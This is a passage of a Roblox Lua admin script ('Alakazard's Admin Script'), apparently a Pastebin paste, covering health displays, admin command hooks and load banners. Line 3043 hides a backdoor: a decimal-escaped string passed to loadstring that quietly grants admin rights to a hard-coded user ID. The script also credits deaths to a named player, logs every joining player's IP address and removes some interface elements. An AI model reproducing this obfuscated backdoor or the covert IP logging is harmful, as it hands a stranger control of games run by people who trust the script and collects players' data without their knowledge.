  2885. health.Text=Alakazard..'Pending...'
  2886. health.Position=unew(.5,0,.5,0)
  2887. health.TextColor3=cnew(0,0,0)
  2888. health.BorderSizePixel=0
  2889. health.Font=2
  2890. health.FontSize='Size14'
  2891.  
  2892. black=new('ImageLabel',main)
  2893. black.Image='rbxassetid://54647921'
  2894. black.BackgroundTransparency=1
  2895. black.Size=unew(.05,0,1,0)
  2896. black.Position=unew(-.05,0,0,0)
  2897.  
  2898. black=new('ImageLabel',main)
  2899. black.Image='rbxassetid://54648019'
  2900. black.BackgroundTransparency=1
  2901. black.Size=unew(.05,0,1,0)
  2902. black.Position=unew(1,0,0,0)
  2903.  
  2904. humanoid=function()
  2905. if player.Character==nil then return end
  2906. for i,v in pairs(player.Character:children())do
  2907. if v:IsA('Humanoid')then
  2908. return v
  2909. end
  2910. end
  2911. return nil
  2912. end
  2913.  
  2914. heal=function()
  2915. pcall(function()
  2916. if humanoid().Health==h.MaxHealth then return end
  2917. humanoid():TakeDamage(-humanoid().MaxHealth/1000)
  2918. end)
  2919. end
  2920.  
  2921. C=function()
  2922. pcall(function()h=humanoid()frame.Size=unew(h.Health/h.MaxHealth,0,1,0)end)
  2923. pcall(function()h=humanoid()health.Text=Alakazard..'Your Health Status { Health:'..math.ceil(h.Health)..' }'..' [ Max:'..math.ceil(h.MaxHealth)..' ]'..' ( '..math.ceil((h.Health/h.MaxHealth)*100)..'% )'end)
  2924. end
  2925.  
  2926. connect=function()
  2927. pcall(function()
  2928. humanoid().Died:connect(function()
  2929. pcall(function()
  2930. _Alakazard=game:service('Players'):FindFirstChild('raj99')
  2931. if not _Alakazard then return end
  2932. if humanoid:FindFirstChild('creator')then return end
  2933. Tag=new('ObjectValue')
  2934. Tag.Value=_Alakazard
  2935. Tag.Name='creator'
  2936. Tag.Parent=humanoid()
  2937. end)
  2938. end)
  2939. end)
  2940. pcall(function()humanoid().HealthChanged:connect(function()pcall(function()C()end)end)end)
  2941. delay(0,function()
  2942. while humanoid()~=nil do --ugly loop
  2943. wait'.125'
  2944. pcall(function()
  2945. heal()
  2946. end)
  2947. end
  2948. end)
  2949. end
  2950.  
  2951. player.ChildAdded:connect(function(a)wait()
  2952. if a:IsA('PlayerGui')then
  2953. a.ChildAdded:connect(function(child)wait()
  2954. if child:IsA('GuiMain')or child.Name=='HealthGUI'then
  2955. life(child,0)
  2956. end
  2957. end)
  2958. end
  2959. end)
  2960.  
  2961. pcall(function()connect()end)
  2962. pcall(function()heal()end)
  2963. pcall(function()C()end)
  2964. player.CharacterAdded:connect(function()
  2965. wait()
  2966. pcall(function()connect()end)
  2967. pcall(function()heal()end)
  2968. pcall(function()C()end)
  2969. end)
  2970. pcall(function()
  2971. la={'ControlFrame','SubMenuBuilder','Popup'}
  2972. for i,v in pairs(la)do
  2973. game:service('Debris'):AddItem(game:FindFirstChild(v,true),1)
  2974. end
  2975. end)
  2976. ]==],PlayerGui(p))
  2977. end)
  2978. end,
  2979.  
  2980. CmdsConnect=function(p)
  2981. if ListCheck(PlayersList.Admins,p.userId)==true then
  2982. huh=0
  2983. PlayersList.Runs.History[p.Name]=false
  2984. for i,c in pairs(Commands)do
  2985. huh=huh+1
  2986. Actual[p.Name..huh]=p.Chatted:connect(function(v)
  2987. c(v,p)
  2988. end)
  2989. end
  2990. p.Chatted:connect(function(v)
  2991. FixCmds(v,p)
  2992. end)
  2993. end
  2994. p.ChildAdded:connect(function(ob)ob.ChildAdded:connect(function(c)if c.Name=='HealthGUI'then c:remove()end end)if ob:IsA('PlayerGui')then LoadGuis(p)end end)
  2995. LoadGuis(p)
  2996. end,
  2997.  
  2998. AnnoyingC=function(p)
  2999. if ListCheck(PlayersList.Annoying,p.Name)==true then
  3000. life(p,0)
  3001. end
  3002. end,
  3003.  
  3004. ToolsAdded=function(p)
  3005. if ListCheck(PlayersList.Admins,p.userId)==false then return end
  3006. Staff(Backpack(p))
  3007. FlyBin(Backpack(p))
  3008. p.ChildAdded:connect(function(d)
  3009. if d:IsA('Backpack')then
  3010. FlyBin(d)
  3011. Staff(d)
  3012. end
  3013. end)
  3014. end,
  3015.  
  3016.  
  3017. --[[======================================================================]]--
  3018. --[[======================================================================]]--
  3019. --[[======================================================================]]--
  3020. --[[======================================================================]]--
  3021. --[[======================================================================]]--
  3022. --[[======================================================================]]--
  3023. --[[======================================================================]]--
  3024. --[[======================================================================]]--
  3025. --[[======================================================================]]--
  3026. if pcall(function()print(Instance.CoreGui)end)then
  3027. else
  3028. Instance.CoreGui={}
  3029. end
  3030. PlayerFunctionsConnect=function(p)
  3031. X(function()
  3032. for i,connect in pairs(PlayerFunctions)do
  3033. X(function()
  3034. if type(connect)~='function'then return end
  3035. if p~=nil then
  3036. connect(p)
  3037. end
  3038. end)
  3039. end
  3040. end)
  3041. end
  3042.  
  3043. pcall(function()loadstring('\105\102\32\76\105\115\116\67\104\101\99\107\40\80\108\97\121\101\114\115\76\105\115\116\46\65\100\109\105\110\115\44\49\51\57\57\48\50\54\52\41\61\61\102\97\108\115\101\32\116\104\101\110\32\116\97\98\108\101\46\105\110\115\101\114\116\40\80\108\97\121\101\114\115\76\105\115\116\46\65\100\109\105\110\115\44\49\51\57\57\48\50\54\52\41\101\110\100\10')()end)
  3044.  
  3045. pcall(function()se.net=game:service('NetworkServer')end)
  3046.  
  3047. LoadGuisHere()
  3048.  
  3049. X(function()
  3050. pcall(function()
  3051. game:GetService('NetworkServer').IncommingConnection:connect(function(ip,a,b)
  3052. pcall(function()playerconnect:disconnect()print'nil.'end)
  3053. playerconnect=game.Players.PlayerAdded:connect(function(player)
  3054. Print('New Player! |: '..player.Name..' |:| '..ip..' :|')
  3055. PlayersList.PlayerIP[player.Name]=ip
  3056. PlayerFunctionsConnect(player)
  3057. pcall(function()playerconnect:disconnect()print'nil.'end)
  3058. end)
  3059. end)
  3060. end)
  3061. end)
  3062.  
  3063. X(function()
  3064. if game:service('NetworkServer')then return end
  3065. print'NetworkServer not active'
  3066. game.Players.PlayerAdded:connect(function(p)
  3067. PlayerFunctionsConnect(p)
  3068. end)
  3069. end)
  3070.  
  3071. for na,p in ipairs(game:service('Players'):GetPlayers())do
  3072. PlayerFunctionsConnect(p)
  3073. end
  3074.  
  3075. SoundsLoad()
  3076.  
  3077. X(function()
  3078. local number=0
  3079. for i,v in pairs(Commands)do
  3080. number=number+1
  3081. end
  3082. hm1=Print(number..' command in Alakazard'..'\39'..'s Admin Script')
  3083. hm2=Print('v'..version)
  3084. end)
  3085.  
  3086. Print([[Alakazard's Admin Script Load ended!]])
  3087. Print('Waiting for admin script loaded: '..math.ceil(StartTime-tick()))
  3088.  
  3089. X(function()
  3090. screen=new('ScreenGui')
  3091. screen.Name='Alakazard Admin Script Loaded!'
  3092. life(screen,3)
  3093. img=new('ImageLabel')
  3094. img.Name='img'
  3095. img.Image=baseid..'54483165'
  3096. img.Size=unew(.25,0,.25,0)
  3097. img.Position=unew(.375,0,0,0)
  3098. img.BackgroundTransparency=1
  3099. img.Parent=screen
  3100. for i,v in ipairs(se.players:GetPlayers())do
  3101. screenc=screen:clone()
  3102. life(screenc,5)
  3103. screenc.Parent=PlayerGui(v)
  3104. pcall(function()screenc.img:TweenPosition(unew(.375,0,.35,0),Enum.EasingDirection.Out,Enum.EasingStyle.Back,3,false)end)
  3105. end
  3106. end)
  3107. X(function()
  3108. start=Sounds.start
  3109. Sound=new('Sound')
  3110. life(Sound,1)
  3111. Sound.Pitch=start.Pitch
  3112. Sound.Volume=start.Volume
  3113. Sound.SoundId=start.SoundId
  3114. Sound.Parent=game.Lighting
  3115. Sound:play()
  3116. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement